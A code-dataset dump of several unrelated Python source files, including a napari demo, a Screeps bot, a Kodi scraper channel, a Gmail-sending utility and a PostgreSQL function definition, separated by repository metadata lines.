#remaining = sample[match.end():]
#print('"{}", "{}"'.format(match.group(1), remaining))
#match = re.search(bracketed, remaining)
#print(match.group(1))
#remaining = sample[match.end():]
# only for outer-most
def findWord(line: str) -> (str, str):
res = re.search(regex, line)
if res:
return (res.group(1), line[res.end():])
else:
return ('', line)
# returns (result, str-result)
def findBracketed(line: str) -> (str, str):
depth = 0
for i in range(0, len(line)):
c = line[i]
if c == '(':
depth += 1
elif c == ')':
depth -= 1
if depth == 0:
return (line[1:i], line[i + 1:])
return ('', line)
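# Illustrative: findBracketed("(NEWS|)SSS") returns ("NEWS|", "SSS").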
def parseLine(line: str) -> []:
validStrings = []
word = findWord(line)
if re.search(final, line) == None:
print(word[0])
validStrings.append(word[0])
if word[1][0] == ')':
return validStrings
elif word[1][0:2] == '|)':
return validStrings
elif word[1][0] == '|':
parseLine(word[1])
else:
parseLine(word[1])
else:
#print('final', line)
print(validStrings)
#return validStrings
#print(remaining)
#print(findBracketed(remaining))
#match = re.search(bracketed, remaining)
#print(match.group(0))
print(sample)
#sys.setrecursionlimit(100)
parseLine(sample)
#while sample != '$':
#for i in range(0, 11):
""" depth = 0
while re.search(final, sample) == None:
word = findWord(sample)
sample = word[1]
print('[{}, {}]'.format(word[0], sample))
if sample[0] == '(':
depth += 1
elif sample[0] == ')':
depth -= 1
elif sample[0:2] == '|)':
# add 'or just move on' option
depth -= 1
elif sample[0] == '|':
pass """
#brckt = findBracketed(sample)
#sample = brckt[1]
#print(brckt[0])
#word = findWord(sample)
#sample = word[1]
#print(word[0])
examples/interaction_box_image.py | royerloic/napari-gui | 0 | 6616788 | <reponame>royerloic/napari-gui
"""
Demonstrate interaction box on image layer
"""
from skimage import data
import numpy as np
import napari
from napari.utils.transforms import Affine
def on_transform_changed_drag(event):
viewer.layers.selection.active.affine = event.value
viewer = napari.view_image(data.astronaut(), rgb=True)
viewer.layers.selection.active.interactive = False
viewer.overlays.interaction_box.points = viewer.layers.selection.active.extent.world
viewer.overlays.interaction_box.show = True
viewer.overlays.interaction_box.show_vertices = True
viewer.overlays.interaction_box.show_handle = True
viewer.overlays.interaction_box.allow_new_selection = False
viewer.overlays.interaction_box.events.transform_drag.connect(on_transform_changed_drag)
napari.run()
| """
Demonstrate interaction box on image layer
"""
from skimage import data
import numpy as np
import napari
from napari.utils.transforms import Affine
def on_transform_changed_drag(event):
viewer.layers.selection.active.affine = event.value
viewer = napari.view_image(data.astronaut(), rgb=True)
viewer.layers.selection.active.interactive = False
viewer.overlays.interaction_box.points = viewer.layers.selection.active.extent.world
viewer.overlays.interaction_box.show = True
viewer.overlays.interaction_box.show_vertices = True
viewer.overlays.interaction_box.show_handle = True
viewer.overlays.interaction_box.allow_new_selection = False
viewer.overlays.interaction_box.events.transform_drag.connect(on_transform_changed_drag)
napari.run() | en | 0.509532 | Demonstrate interaction box on image layer | 2.49411 | 2 |
src/bots/spawn_delivery.py | ForgedSnow/ScreepsPython | 0 | 6616789 | from defs import *
__pragma__('noalias', 'name')
__pragma__('noalias', 'undefined')
__pragma__('noalias', 'Infinity')
__pragma__('noalias', 'keys')
__pragma__('noalias', 'get')
__pragma__('noalias', 'set')
__pragma__('noalias', 'type')
__pragma__('noalias', 'update')
def make_parts(max_energy):
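    # Screeps body part costs: WORK = 100, CARRY = 50, MOVE = 50 energy,
    # so the base body [WORK, CARRY, MOVE, MOVE] below costs 250.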
parts = [WORK, CARRY, MOVE, MOVE]
count = max_energy - 300
if max_energy <= 300:
return [WORK, CARRY, MOVE, MOVE]
while count >= 50:
if count >= 100:
parts.append(WORK)
count -= 100
if count >= 50:
parts.append(CARRY)
count -= 50
if count >= 50:
parts.append(MOVE)
            count -= 50  # MOVE parts cost 50 energy
return parts
def run_spawn_delivery(creep):
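    # Two-state loop: while 'working' the creep harvests from the room's first
    # active source; once full it flips state and delivers to spawn 'Snow'.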
if not creep.memory.working and creep.store[RESOURCE_ENERGY] == 0:
creep.memory.working = True
creep.say('collecting')
if creep.memory.working and creep.store.getFreeCapacity() == 0:
creep.memory.working = False
creep.say('working')
if creep.memory.working:
# nearest = creep.pos.findClosestByRange(FIND_SOURCES_ACTIVE)
nearest = creep.room.find(FIND_SOURCES_ACTIVE)[0]
if creep.harvest(nearest) == ERR_NOT_IN_RANGE:
creep.moveTo(nearest, {"visualizePathStyle": {"stroke": '#ffaa00'}})
else:
if creep.transfer(Game.spawns['Snow'], RESOURCE_ENERGY) == ERR_NOT_IN_RANGE:
            creep.moveTo(Game.spawns['Snow'])
setup.py | jrieffel/numpy_turtle | 5 | 6616790 | from setuptools import setup
setup(
name='numpy-turtle',
version='0.2',
packages=['numpy_turtle'],
python_requires='>=3.5',
install_requires=['numpy>=1.13.1', 'scikit_image>=0.13.1'],
url='https://github.com/jorenham/numpy_turtle',
license='MIT',
author='<NAME>',
author_email='<EMAIL>',
description='Turtle graphics with NumPy',
test_suite='nose.collector',
tests_require=['nose', 'tox'],
)
benchmarks/xlmr/ootb/xlmr_parser.py | samiwilf/FAMBench | 9 | 6616791 | import argparse
import json
"""
Parse inputs for the XLM-R benchmark
"""
def dict_serialize(seqlen_dist_dict):
"""
dict->str
Turns {1:'a',2:'b'}->"[[1,'a'],[2,'b']]"
Why? Because this format plays nice with shell script that runs xlmr_bench.
Avoids curly braces and spaces that makes shell script str input unhappy.
"""
seqlen_dist_lst = list(seqlen_dist_dict.items())
seqlen_dist_str = json.dumps(seqlen_dist_lst)
seqlen_dist_str = seqlen_dist_str.replace(" ", "") # remove spaces
return seqlen_dist_str
def dict_deserialize(seqlen_dist_str):
"""
str->dict
"""
seqlen_dist_json = json.loads(seqlen_dist_str)
return dict(seqlen_dist_json)
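# Round-trip sketch: dict_serialize({1: 0.5}) -> '[[1,0.5]]' and
# dict_deserialize('[[1,0.5]]') -> {1: 0.5}.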
def init_argparse() -> argparse.ArgumentParser:
"""
Returns a parser that can parse the given inputs by calling parser.parse_args()
Some types are functions - this is because argparse under the hood just calls the type on the input string.
Eg if type=int, then if you get a str="123", argparse calls int("123")->123.
"""
parser = argparse.ArgumentParser(
description="Benchmark XLM-R model"
)
parser.add_argument("--logdir", type=str, default=None)
parser.add_argument("--inference-only", action="store_true", default=False)
parser.add_argument("--famconfig", type=str, default="tiny")
parser.add_argument("--use-gpu", action="store_true", default=False)
parser.add_argument("--num-batches", type=int, default=10) # num batches to benchmark
parser.add_argument("--warmup-batches", type=int, default=0) # num batches to warmup
parser.add_argument("--batch-size", type=int, default=64)
parser.add_argument("--sequence-length", type=int, default=64)
parser.add_argument("--vocab-size", type=int, default=250000)
parser.add_argument("--half-model", action="store_true", default=False)
parser.add_argument('--seqlen-dist', type=str, default=None) # sequence length distribution. Type is string in JSON format.
parser.add_argument('--seqlen-dist-max', type=int, default=256) # maximum allowed sequence length
    return parser
Day3/second.py | Woody1474747/AOC2021_Solutions | 0 | 6616792 | with open("test.txt") as file:
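    # Advent of Code 2021, day 3 part 2: repeatedly filter the report on the
    # most/least common bit per position to get the oxygen generator and CO2
    # scrubber ratings; the answer is their product.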
remaining = []
lines = file.readlines()
remaining = lines
for i in range(0, len(lines[0]) -1):
one = 0
zero = 0
cache = remaining
for line in cache:
if int(line[i]) == 0:
zero = zero + 1
else:
one = one + 1
remaining = []
        if one >= zero:
            for line in cache:
                if line[i] == "1":
                    remaining.append(line)
else:
for line in cache:
if line[i] == "0":
remaining.append(line)
oxygen = remaining[0]
remaining = lines
for i in range(0, len(lines[0]) - 1):
one = 0
zero = 0
cache = remaining
for line in cache:
if int(line[i]) == 0:
zero = zero + 1
else:
one = one + 1
remaining = []
        if one >= zero:
            for line in cache:
                if line[i] == "0":
                    remaining.append(line)
else:
for line in cache:
if line[i] == "1":
remaining.append(line)
if int(len(remaining)) == 1:
co = remaining[0]
print("end")
break
print(len(remaining))
    print(int(oxygen, 2) * int(co, 2))
channels/mmaiptv.py | sodicarus/channels | 0 | 6616793 | # -*- coding: utf-8 -*-
# StreamOnDemand Community Edition - Kodi Addon
# ------------------------------------------------------------
# streamondemand.- XBMC Plugin
# Channel: mmaiptv
# http://www.mimediacenter.info/foro/viewforum.php?f=36
# Version: 201803160900
# ------------------------------------------------------------
import re
import urlparse
from core import config, httptools
from platformcode import logger
from core import scrapertools
from core import servertools
from core.item import Item
from core.tmdb import infoSod
#todo 1 : unify list_titles and episodes
#todo 2 : check for the presence of adfly links
#todo 3 : add more menus (recently added and ongoing) which seem to use adfly
__channel__ = "mmaiptv"
host = "http://mmaiptv.it"
headers = [['Referer', host]]
def mainlist(item):
logger.info("[mmaiptv.py] mainlist")
# Main options
itemlist = [Item(channel=__channel__,
action="list_titles",
title="[COLOR azure]Tutti[/COLOR]",
url="%s/b.php" % host,
extra="anime",
thumbnail="http://orig03.deviantart.net/6889/f/2014/079/7/b/movies_and_popcorn_folder_icon_by_matheusgrilo-d7ay4tw.png"),
Item(channel=__channel__,
action="search",
title="[COLOR yellow]Cerca[/COLOR]",
url="%s/b.php" % host,
extra="search",
thumbnail="http://dc467.4shared.com/img/fEbJqOum/s7/13feaf0c8c0/Search")]
return itemlist
def list_titles(item):
logger.info("[mmaiptv.py] list_titles")
itemlist = []
if item.url == "":
item.url = host
    # Load the page
data = httptools.downloadpage(item.url, headers=headers).data
patronvideos = '<div class="tab-pane active".*?<font color="#000000">([^<]+)<\/font>.*?<a href="([^"]+)"><img src="([^"]+)".*?<\/div>'
matches = re.compile(patronvideos, re.DOTALL).findall(data)
for scrapedtitle, scrapedurl, scrapedthumbnail in matches:
itemlist.append(
Item(channel=__channel__,
action="episodes",
fulltitle=scrapedtitle,
show=scrapedtitle,
title=scrapedtitle,
url=scrapedurl if not 'search' in item.extra else (host + "/"+scrapedurl),
thumbnail=scrapedthumbnail,
extra=item.extra,
viewmode="movie_with_plot",
Folder=True))
return itemlist
def episodes(item):
logger.info("[mmaiptv.py] serietv")
itemlist = []
    # Load the page
data = httptools.downloadpage(item.url, headers=headers).data
patronvideos = '<div class="tab-pane active".*?<font color="#000000">([^<]+)<\/font>.*?<a href="([^"]+)"><img src="([^"]+)".*?<\/div>'
matches = re.compile(patronvideos, re.DOTALL).findall(data)
for scrapedtitle,scrapedurl,scrapedthumbnail in matches:
itemlist.append(
Item(channel=__channel__,
action="findvideos",
fulltitle=scrapedtitle,
show=scrapedtitle,
title=scrapedtitle,
url=scrapedurl,
thumbnail=scrapedthumbnail,
extra=item.extra,
viewmode="movie_with_plot"))
return list(reversed(itemlist))
def search(item, texto):
logger.info("[mmaiptv.py] search")
item.url = host + "/d.php?search=" + texto
return list_titles(item)
def findvideos(item):
logger.info("[mmaiptv.py] findvideos")
itemlist = []
data = httptools.downloadpage(item.url, headers=headers).data
patron = "file: \"([^\"]+)\""
matches = re.compile(patron, re.DOTALL).findall(data)
headers.append(['Referer', item.url])
for video in matches:
itemlist.append(Item(channel=__channel__, action="play", title=item.title,url=video, folder=False))
return itemlist
| # -*- coding: utf-8 -*-
# StreamOnDemand Community Edition - Kodi Addon
# ------------------------------------------------------------
# streamondemand.- XBMC Plugin
# Canale mmaiptv
# http://www.mimediacenter.info/foro/viewforum.php?f=36
# Version: 201803160900
# ------------------------------------------------------------
import re
import urlparse
from core import config, httptools
from platformcode import logger
from core import scrapertools
from core import servertools
from core.item import Item
from core.tmdb import infoSod
#todo 1 : uniformare list_titles e episodes
#todo 2 : verificare la presenza di link adfly
#todo 3 : aggiungere altri menu (caricati di recente e in corso) che sembrano avere adfly
__channel__ = "mmaiptv"
host = "http://mmaiptv.it"
headers = [['Referer', host]]
def mainlist(item):
logger.info("[mmaiptv.py] mainlist")
# Main options
itemlist = [Item(channel=__channel__,
action="list_titles",
title="[COLOR azure]Tutti[/COLOR]",
url="%s/b.php" % host,
extra="anime",
thumbnail="http://orig03.deviantart.net/6889/f/2014/079/7/b/movies_and_popcorn_folder_icon_by_matheusgrilo-d7ay4tw.png"),
Item(channel=__channel__,
action="search",
title="[COLOR yellow]Cerca[/COLOR]",
url="%s/b.php" % host,
extra="search",
thumbnail="http://dc467.4shared.com/img/fEbJqOum/s7/13feaf0c8c0/Search")]
return itemlist
def list_titles(item):
logger.info("[mmaiptv.py] list_titles")
itemlist = []
if item.url == "":
item.url = host
# Carica la pagina
data = httptools.downloadpage(item.url, headers=headers).data
patronvideos = '<div class="tab-pane active".*?<font color="#000000">([^<]+)<\/font>.*?<a href="([^"]+)"><img src="([^"]+)".*?<\/div>'
matches = re.compile(patronvideos, re.DOTALL).findall(data)
for scrapedtitle, scrapedurl, scrapedthumbnail in matches:
itemlist.append(
Item(channel=__channel__,
action="episodes",
fulltitle=scrapedtitle,
show=scrapedtitle,
title=scrapedtitle,
url=scrapedurl if not 'search' in item.extra else (host + "/"+scrapedurl),
thumbnail=scrapedthumbnail,
extra=item.extra,
viewmode="movie_with_plot",
Folder=True))
return itemlist
def episodes(item):
logger.info("[mmaiptv.py] serietv")
itemlist = []
# Carica la pagina
data = httptools.downloadpage(item.url, headers=headers).data
patronvideos = '<div class="tab-pane active".*?<font color="#000000">([^<]+)<\/font>.*?<a href="([^"]+)"><img src="([^"]+)".*?<\/div>'
matches = re.compile(patronvideos, re.DOTALL).findall(data)
for scrapedtitle,scrapedurl,scrapedthumbnail in matches:
itemlist.append(
Item(channel=__channel__,
action="findvideos",
fulltitle=scrapedtitle,
show=scrapedtitle,
title=scrapedtitle,
url=scrapedurl,
thumbnail=scrapedthumbnail,
extra=item.extra,
viewmode="movie_with_plot"))
return list(reversed(itemlist))
def search(item, texto):
logger.info("[mmaiptv.py] search")
item.url = host + "/d.php?search=" + texto
return list_titles(item)
def findvideos(item):
logger.info("[mmaiptv.py] findvideos")
itemlist = []
data = httptools.downloadpage(item.url, headers=headers).data
patron = "file: \"([^\"]+)\""
matches = re.compile(patron, re.DOTALL).findall(data)
    headers.append(['Referer', item.url])  # note: mutates the module-level headers list on every call
for video in matches:
        itemlist.append(Item(channel=__channel__, action="play", title=item.title, url=video, folder=False))
return itemlist
| it | 0.381173 | # -*- coding: utf-8 -*- # StreamOnDemand Community Edition - Kodi Addon # ------------------------------------------------------------ # streamondemand.- XBMC Plugin # mmaiptv channel # http://www.mimediacenter.info/foro/viewforum.php?f=36 # Version: 201803160900 # ------------------------------------------------------------ #todo 1 : unify list_titles and episodes #todo 2 : check for the presence of adfly links #todo 3 : add more menus (recently added and ongoing), which seem to use adfly # Main options # Load the page # Load the page | 1.732372 | 2 |
twitter/envs/__init__.py | Ra-Ni/Twitter-Language-Identifier | 0 | 6616794 | from .corpus import *
| from .corpus import *
| none | 1 | 0.931267 | 1 | |
mainapp/migrations/0004_auto_20180811_0952.py | sndp487/rescuekerala | 657 | 6616795 | # Generated by Django 2.1 on 2018-08-11 09:52
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("mainapp", "0003_auto_20180811_0946"),
]
operations = [
migrations.AlterField(model_name="request", name="status", field=models.BooleanField(default=False),),
]
| # Generated by Django 2.1 on 2018-08-11 09:52
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("mainapp", "0003_auto_20180811_0946"),
]
operations = [
migrations.AlterField(model_name="request", name="status", field=models.BooleanField(default=False),),
]
| en | 0.680792 | # Generated by Django 2.1 on 2018-08-11 09:52 | 1.474763 | 1 |
AM_Nihoul_website/admin/utils.py | pierre-24/AM-Nihoul-website | 0 | 6616796 |
"""
Utility functions to send an email via Gmail, extended to accept embedded files. Most of the code is due to
https://github.com/jeremyephron/simplegmail/blob/66e776d5211042b2868664ca800bdfc45323732c/simplegmail/gmail.py
"""
from typing import Optional, List
import base64
import mimetypes
import pathlib
from email.mime.audio import MIMEAudio
from email.mime.application import MIMEApplication
from email.mime.base import MIMEBase
from email.mime.image import MIMEImage
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from googleapiclient.discovery import build
from googleapiclient.errors import HttpError
from httplib2 import Http
from oauth2client import client, file, tools
from oauth2client.clientsecrets import InvalidClientSecretsError
class Message:
"""Class representing a message, ready to be sent
"""
def __init__(
self,
sender: str,
recipient: str,
subject: str = '',
msg_html: str = '',
msg_plain: str = '',
cc: List[str] = None,
bcc: List[str] = None
):
self.sender = sender
self.recipient = recipient
self.subject = subject
self.msg_plain = msg_plain
self.msg_html = msg_html
self.cc = [] if cc is None else cc
self.bcc = [] if bcc is None else bcc
self.html_attachments: List[MIMEBase] = []
self.extra_attachments: List[MIMEBase] = []
def add_attachment(self, path: pathlib.Path) -> None:
"""Attach a file as a normal attachment"""
attachment = Message.create_attachment_from_file(path)
self.extra_attachments.append(attachment)
def add_html_attachment(self, path: pathlib.Path, cid: str = None) -> None:
"""Add a HTML inline attachment (to be embedded).
If `cid` is `None`, the `cid` is taken as the file basename.
"""
if cid is None:
cid = path.name
attachment = Message.create_attachment_from_file(path, 'inline', cid)
self.html_attachments.append(attachment)
@staticmethod
def create_attachment_from_file(path: pathlib.Path, disposition: str = 'attachment', cid: str = None) -> MIMEBase:
"""Create an attachment from a file"""
content_type, encoding = mimetypes.guess_type(str(path))
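        # e.g. mimetypes.guess_type('logo.png') returns ('image/png', None);
        # an unrecognized extension yields (None, None) and falls through to
        # the octet-stream default below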
name = path.name
        # fall back to application/octet-stream when the type cannot be guessed or the file is encoded
if content_type is None or encoding is not None:
content_type = 'application/octet-stream'
# create attachment
main_type, sub_type = content_type.split('/', 1)
with path.open('rb') as f:
raw_data = f.read()
if main_type == 'text':
attachment = MIMEText(raw_data.decode('UTF-8'), _subtype=sub_type)
elif main_type == 'image':
attachment = MIMEImage(raw_data, _subtype=sub_type)
elif main_type == 'audio':
attachment = MIMEAudio(raw_data, _subtype=sub_type)
elif main_type == 'application':
attachment = MIMEApplication(raw_data, _subtype=sub_type)
else:
attachment = MIMEBase(main_type, sub_type)
attachment.set_payload(raw_data)
# add info
attachment.add_header('Content-Disposition', disposition, filename=name)
if cid is not None:
attachment.add_header('Content-ID', '<{}>'.format(cid))
return attachment
def prepare(self) -> dict:
"""
        Get the message in a form that the Gmail API understands
"""
has_attachments = len(self.extra_attachments) != 0 or len(self.html_attachments) != 0
# create the message
msg = MIMEMultipart('mixed' if has_attachments else 'alternative')
msg['To'] = self.recipient
msg['From'] = self.sender
msg['Subject'] = self.subject
if len(self.cc) > 0:
msg['Cc'] = ', '.join(self.cc)
if len(self.bcc) > 0:
msg['Bcc'] = ', '.join(self.bcc)
# attach the text(s) to the message correctly
attachments = []
attach_plain = MIMEText(self.msg_plain, 'plain')
attach_html = MIMEText(self.msg_html, 'html')
if not has_attachments:
if self.msg_plain:
attachments.append(attach_plain)
if self.msg_html:
attachments.append(attach_html)
else:
attachment_alt = MIMEMultipart('alternative')
attach_related = MIMEMultipart('related')
if self.msg_plain:
attachment_alt.attach(attach_plain)
if self.msg_html:
attach_related.attach(attach_html)
# add the HTML attachments to the related part
for attachment in self.html_attachments:
attach_related.attach(attachment)
attachment_alt.attach(attach_related)
attachments.append(attachment_alt)
# add other attachments
attachments.extend(self.extra_attachments)
# attach
for attachment in attachments:
msg.attach(attachment)
# get dict
return {
'raw': base64.urlsafe_b64encode(msg.as_string().encode()).decode()
}
class Gmail:
"""
The Gmail object, used as entry point for the Gmail API.
"""
# Allow Gmail to read and write emails, and access settings like aliases.
_SCOPES = [
'https://www.googleapis.com/auth/gmail.modify',
'https://www.googleapis.com/auth/gmail.settings.basic'
]
def __init__(
self,
client_secret_file: str = 'client_secret.json',
creds_file: str = 'gmail_token.json',
_creds: Optional[client.Credentials] = None
) -> None:
self.client_secret_file = client_secret_file
self.creds_file = creds_file
try:
if _creds:
self.creds = _creds
else:
store = file.Storage(self.creds_file)
self.creds = store.get()
if not self.creds or self.creds.invalid:
# Will ask you to authenticate an account in your browser.
flow = client.flow_from_clientsecrets(self.client_secret_file, self._SCOPES)
self.creds = tools.run_flow(flow, store)
self.service = build('gmail', 'v1', http=self.creds.authorize(Http()), cache_discovery=False)
except InvalidClientSecretsError:
raise FileNotFoundError(
"Your 'client_secret.json' file is nonexistent. Make sure "
'the file is in the root directory of your application. If '
"you don't have a client secrets file, go to https://"
'developers.google.com/gmail/api/quickstart/python, and '
'follow the instructions listed there.'
)
def send(self, message: Message, user_id: str = 'me') -> None:
"""Send a message
"""
msg = message.prepare()
try:
req = self.service.users().messages().send(userId=user_id, body=msg)
req.execute()
except HttpError as error:
# Pass along the error
raise error
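# minimal usage sketch: the paths and addresses below are hypothetical, and
# constructing Gmail() assumes a valid client_secret.json / gmail_token.json
# pair is available
if __name__ == '__main__':
    demo = Message(
        sender='sender@example.com',
        recipient='recipient@example.com',
        subject='Newsletter',
        msg_plain='Hello!',
        msg_html='<p>Hello! <img src="cid:logo.png"></p>',
    )
    demo.add_html_attachment(pathlib.Path('logo.png'))  # inline, matches the cid: URL above
    demo.add_attachment(pathlib.Path('report.pdf'))  # ordinary attachment
    Gmail().send(demo)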
| """
Utility functions to send an email via Gmail, extended to accept embedded files. Most of the code is due to
https://github.com/jeremyephron/simplegmail/blob/66e776d5211042b2868664ca800bdfc45323732c/simplegmail/gmail.py
"""
from typing import Optional, List
import base64
import mimetypes
import pathlib
from email.mime.audio import MIMEAudio
from email.mime.application import MIMEApplication
from email.mime.base import MIMEBase
from email.mime.image import MIMEImage
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from googleapiclient.discovery import build
from googleapiclient.errors import HttpError
from httplib2 import Http
from oauth2client import client, file, tools
from oauth2client.clientsecrets import InvalidClientSecretsError
class Message:
"""Class representing a message, ready to be sent
"""
def __init__(
self,
sender: str,
recipient: str,
subject: str = '',
msg_html: str = '',
msg_plain: str = '',
cc: List[str] = None,
bcc: List[str] = None
):
self.sender = sender
self.recipient = recipient
self.subject = subject
self.msg_plain = msg_plain
self.msg_html = msg_html
self.cc = [] if cc is None else cc
self.bcc = [] if bcc is None else bcc
self.html_attachments: List[MIMEBase] = []
self.extra_attachments: List[MIMEBase] = []
def add_attachment(self, path: pathlib.Path) -> None:
"""Attach a file as a normal attachment"""
attachment = Message.create_attachment_from_file(path)
self.extra_attachments.append(attachment)
def add_html_attachment(self, path: pathlib.Path, cid: str = None) -> None:
"""Add a HTML inline attachment (to be embedded).
If `cid` is `None`, the `cid` is taken as the file basename.
"""
if cid is None:
cid = path.name
attachment = Message.create_attachment_from_file(path, 'inline', cid)
self.html_attachments.append(attachment)
@staticmethod
def create_attachment_from_file(path: pathlib.Path, disposition: str = 'attachment', cid: str = None) -> MIMEBase:
"""Create an attachment from a file"""
content_type, encoding = mimetypes.guess_type(str(path))
name = path.name
        # fall back to application/octet-stream when the type cannot be guessed or the file is encoded
if content_type is None or encoding is not None:
content_type = 'application/octet-stream'
# create attachment
main_type, sub_type = content_type.split('/', 1)
with path.open('rb') as f:
raw_data = f.read()
if main_type == 'text':
attachment = MIMEText(raw_data.decode('UTF-8'), _subtype=sub_type)
elif main_type == 'image':
attachment = MIMEImage(raw_data, _subtype=sub_type)
elif main_type == 'audio':
attachment = MIMEAudio(raw_data, _subtype=sub_type)
elif main_type == 'application':
attachment = MIMEApplication(raw_data, _subtype=sub_type)
else:
attachment = MIMEBase(main_type, sub_type)
attachment.set_payload(raw_data)
# add info
attachment.add_header('Content-Disposition', disposition, filename=name)
if cid is not None:
attachment.add_header('Content-ID', '<{}>'.format(cid))
return attachment
def prepare(self) -> dict:
"""
        Get the message in a form that the Gmail API understands
"""
has_attachments = len(self.extra_attachments) != 0 or len(self.html_attachments) != 0
# create the message
msg = MIMEMultipart('mixed' if has_attachments else 'alternative')
msg['To'] = self.recipient
msg['From'] = self.sender
msg['Subject'] = self.subject
if len(self.cc) > 0:
msg['Cc'] = ', '.join(self.cc)
if len(self.bcc) > 0:
msg['Bcc'] = ', '.join(self.bcc)
# attach the text(s) to the message correctly
attachments = []
attach_plain = MIMEText(self.msg_plain, 'plain')
attach_html = MIMEText(self.msg_html, 'html')
if not has_attachments:
if self.msg_plain:
attachments.append(attach_plain)
if self.msg_html:
attachments.append(attach_html)
else:
attachment_alt = MIMEMultipart('alternative')
attach_related = MIMEMultipart('related')
if self.msg_plain:
attachment_alt.attach(attach_plain)
if self.msg_html:
attach_related.attach(attach_html)
# add the HTML attachments to the related part
for attachment in self.html_attachments:
attach_related.attach(attachment)
attachment_alt.attach(attach_related)
attachments.append(attachment_alt)
# add other attachments
attachments.extend(self.extra_attachments)
# attach
for attachment in attachments:
msg.attach(attachment)
# get dict
return {
'raw': base64.urlsafe_b64encode(msg.as_string().encode()).decode()
}
class Gmail:
"""
The Gmail object, used as entry point for the Gmail API.
"""
# Allow Gmail to read and write emails, and access settings like aliases.
_SCOPES = [
'https://www.googleapis.com/auth/gmail.modify',
'https://www.googleapis.com/auth/gmail.settings.basic'
]
def __init__(
self,
client_secret_file: str = 'client_secret.json',
creds_file: str = 'gmail_token.json',
_creds: Optional[client.Credentials] = None
) -> None:
self.client_secret_file = client_secret_file
self.creds_file = creds_file
try:
if _creds:
self.creds = _creds
else:
store = file.Storage(self.creds_file)
self.creds = store.get()
if not self.creds or self.creds.invalid:
# Will ask you to authenticate an account in your browser.
flow = client.flow_from_clientsecrets(self.client_secret_file, self._SCOPES)
self.creds = tools.run_flow(flow, store)
self.service = build('gmail', 'v1', http=self.creds.authorize(Http()), cache_discovery=False)
except InvalidClientSecretsError:
raise FileNotFoundError(
"Your 'client_secret.json' file is nonexistent. Make sure "
'the file is in the root directory of your application. If '
"you don't have a client secrets file, go to https://"
'developers.google.com/gmail/api/quickstart/python, and '
'follow the instructions listed there.'
)
def send(self, message: Message, user_id: str = 'me') -> None:
"""Send a message
"""
msg = message.prepare()
try:
req = self.service.users().messages().send(userId=user_id, body=msg)
req.execute()
except HttpError as error:
# Pass along the error
raise error | en | 0.793021 | Utils functions to send an email via Gmail, extended to accept embedded files. Most of the code is due to https://github.com/jeremyephron/simplegmail/blob/66e776d5211042b2868664ca800bdfc45323732c/simplegmail/gmail.py Class representing a message, ready to be sent Attach a file as a normal attachment Add a HTML inline attachment (to be embedded). If `cid` is `None`, the `cid` is taken as the file basename. Create an attachment from a file # backup to octet-stream if any # create attachment # add info Get the message in a form that the Gmail API understand # create the message # attach the text(s) to the message correctly # add the HTML attachments to the related part # add other attachments # attach # get dict The Gmail object, used as entry point for the Gmail API. # Allow Gmail to read and write emails, and access settings like aliases. # Will ask you to authenticate an account in your browser. Send a message # Pass along the error | 2.965809 | 3 |
ppr-api/src/database/postgres_functions/individual_split_2.py | cameron-freshworks/ppr | 0 | 6616797 |
"""Maintain db function searchkey_first_name here."""
from alembic_utils.pg_function import PGFunction
individual_split_2 = PGFunction(
schema="public",
signature="individual_split_2(actual_name character varying)",
definition="""
RETURNS character varying
LANGUAGE plpgsql
AS $function$
DECLARE
v_last_name VARCHAR(150);
v_split_2 VARCHAR(50);
BEGIN
    -- Remove special characters from the last name
v_last_name := regexp_replace(ACTUAL_NAME,'[^\w]+',' ','gi');
    -- Remove prefixes and suffixes from the last name
v_last_name := regexp_replace(v_last_name,'\y(DR|MR|MRS|MS|CH|DE|DO|DA|LE|LA|MA|JR|SR|I|II|III)\y','','gi');
v_last_name := trim(regexp_replace(v_last_name, '\s+', ' ', 'gi'));
    -- Extract the second name token
v_split_2 := split_part(v_last_name,' ',2);
RETURN UPPER(v_split_2);
END
;
$function$;
"""
)
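# minimal usage sketch (the name below is made up): once the function is
# installed,
#   SELECT individual_split_2('MR JOHN ALBERT SMITH');
# strips the MR prefix, collapses whitespace, and returns the second remaining
# token upper-cased: 'ALBERT'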
| """Maintain db function searchkey_first_name here."""
from alembic_utils.pg_function import PGFunction
individual_split_2 = PGFunction(
schema="public",
signature="individual_split_2(actual_name character varying)",
definition="""
RETURNS character varying
LANGUAGE plpgsql
AS $function$
DECLARE
v_last_name VARCHAR(150);
v_split_2 VARCHAR(50);
BEGIN
    -- Remove special characters from the last name
v_last_name := regexp_replace(ACTUAL_NAME,'[^\w]+',' ','gi');
    -- Remove prefixes and suffixes from the last name
v_last_name := regexp_replace(v_last_name,'\y(DR|MR|MRS|MS|CH|DE|DO|DA|LE|LA|MA|JR|SR|I|II|III)\y','','gi');
v_last_name := trim(regexp_replace(v_last_name, '\s+', ' ', 'gi'));
    -- Extract the second name token
v_split_2 := split_part(v_last_name,' ',2);
RETURN UPPER(v_split_2);
END
;
$function$;
"""
) | en | 0.290519 | Maintain db function searchkey_first_name here. RETURNS character varying LANGUAGE plpgsql AS $function$ DECLARE v_last_name VARCHAR(150); v_split_2 VARCHAR(50); BEGIN -- Remove special characters last name v_last_name := regexp_replace(ACTUAL_NAME,'[^\w]+',' ','gi'); -- Remove prefixes suffixes last name v_last_name := regexp_replace(v_last_name,'\y(DR|MR|MRS|MS|CH|DE|DO|DA|LE|LA|MA|JR|SR|I|II|III)\y','','gi'); v_last_name := trim(regexp_replace(v_last_name, '\s+', ' ', 'gi')); -- Split second name v_split_2 := split_part(v_last_name,' ',2); RETURN UPPER(v_split_2); END ; $function$; | 2.510697 | 3 |
mnms/tiled_noise_mpi.py | ACTCollaboration/mnms | 4 | 6616798 |
from orphics import maps
from pixell import enmap, curvedsky, wcsutils
import healpy as hp
from mnms import covtools, utils, mpi
from mnms.tiled_ndmap import tiled_ndmap
import astropy.io.fits as pyfits
import numpy as np
from math import ceil
import matplotlib.pyplot as plt
import time
seedgen = utils.seed_tracker
# hardcoded constants
LARGE_SCALE_TILE_NUM = 103_094
def get_iso_curvedsky_noise_covar(imap, ivar=None, mask=None, N=5, lmax=1000):
"""Get the 1D global, isotropic power spectra to draw sims from later. Ivar maps, if passed
are used to pre-whiten the maps in pixel-space by their high-ell white noise level prior to
measuring power spectra.
Parameters
----------
imap : enmap.ndmap
Map with shape ([num_arrays, num_splits, num_pol,] ny, nx)
ivar : enmap.ndmap, optional
